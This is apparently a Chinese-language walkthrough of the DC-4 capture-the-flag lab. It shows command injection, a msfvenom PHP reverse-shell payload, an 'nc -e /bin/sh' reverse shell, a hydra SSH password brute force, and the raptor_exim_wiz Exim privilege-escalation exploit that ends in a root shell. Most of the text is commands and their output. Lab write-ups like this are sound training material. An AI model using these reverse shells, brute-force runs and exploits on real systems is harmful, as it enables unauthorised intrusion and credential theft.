python <exp>.py cmd=cat /home/jim/test.sh % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 957 0 919 100 38 149k 6333 --:--:-- --:--:-- --:--:-- 155k #!/bin/bash for i in {1..5} do sleep 1 echo"Learn bash they said." sleep 1 echo"Bash is good they said." done echo"But I'd rather bash my head against a brick wall."
Shell BACK
进行一波探测和弹出shell的尝试
非常熟练的生成shell 尝试传递
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
┌──(kali㉿Esonhugh)-[~] └─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.31.141 LPORT=4444 -f raw -o ./shell.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder specified, outputting raw payload Payload size: 1115 bytes Saved as: ./shell.php
┌──(kali㉿Esonhugh)-[~] └─$ python -m http.server python3 is default python version in python commandwhich created by alias
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 192.168.31.241 - - [16/Jan/2021 18:31:34] "GET /shell.php HTTP/1.1" 200 -
这方法直接暴毙 别想了 搞不出来这个meterpreter shell的
返回shell
这里直接用 nc -e解决问题
(nc -e 对对方机子的netcat版本有一定要求的 注意!!)
1
nc -e /bin/sh <ip> port
好家伙,没问题直接给我弹出来了.
开始搜寻文件
这里有三个用户
这个叫jim的用户引起了我们的注意
1 2 3 4 5 6 7 8 9 10 11 12
ls -al && pwd total 32 drwxr-xr-x 3 jim jim 4096 Apr 7 2019 . drwxr-xr-x 5 root root 4096 Apr 7 2019 .. -rw-r--r-- 1 jim jim 220 Apr 6 2019 .bash_logout -rw-r--r-- 1 jim jim 3526 Apr 6 2019 .bashrc -rw-r--r-- 1 jim jim 675 Apr 6 2019 .profile drwxr-xr-x 2 jim jim 4096 Apr 7 2019 backups -rw------- 1 jim jim 528 Apr 6 2019 mbox -rwsrwxrwx 1 jim jim 39 Jan 25 14:20 test.sh /home/jim
─$ hydra -l jim \ #这里是说他的用户名为jim 如果用户名是文件中的话 使用-L <file>进行爆破 -P ./passwords.txt \ #这里是表示 我们的密码字典 ssh://192.168.31.241 #协议 ip和端口 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these * * * ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-24 23:32:09 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 253 login tries (l:1/p:253), ~16 tries per task [DATA] attacking ssh://192.168.31.241:22/ [STATUS] 177.00 tries/min, 177 tries in 00:01h, 77 to doin 00:01h, 16 active [22][ssh] host: 192.168.31.241 login: jim password: jibril04 #看 结果出来了 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-24 23:33:43
$ ssh [email protected]#直接ssh登陆冲上去 The authenticity of host '192.168.31.119 (192.168.31.119)' can't be established. ECDSA key fingerprint is SHA256:vtcgdCXO4d3KmnjiIIkH1Een5F1AiSx3qp0ABgwdvww. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.31.119' (ECDSA) to the list of known hosts. [email protected]'s password: Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have mail. Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100 jim@dc-4:~$ ls backups mbox test.sh jim@dc-4:~$ ls -al total 32 drwxr-xr-x 3 jim jim 4096 Apr 7 2019 . drwxr-xr-x 5 root root 4096 Apr 7 2019 .. drwxr-xr-x 2 jim jim 4096 Apr 7 2019 backups -rw-r--r-- 1 jim jim 220 Apr 6 2019 .bash_logout -rw-r--r-- 1 jim jim 3526 Apr 6 2019 .bashrc -rw------- 1 jim jim 528 Apr 6 2019 mbox -rw-r--r-- 1 jim jim 675 Apr 6 2019 .profile -rwsrwxrwx 1 jim jim 174 Apr 6 2019 test.sh jim@dc-4:~$
raptor_exim_wiz - "The Return of the WIZard" LPE exploit Copyright (c) 2019 Marco Ivaldi <[email protected]>
Delivering netcat payload... 220 dc-4 ESMTP Exim 4.89 Mon, 25 Jan 2021 16:34:02 +1000 250 dc-4 Hello localhost [::1] 250 OK 250 Accepted 354 Enter message, ending with "." on a line by itself 250 OK id=1l3vRq-0000HP-OZ 221 dc-4 closing connection
Waiting 5 seconds... localhost [127.0.0.1] 31337 (?) open ls db gnutls-params-2048 input msglog whoami root cd /root ls flag.txt cat flag.txt
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.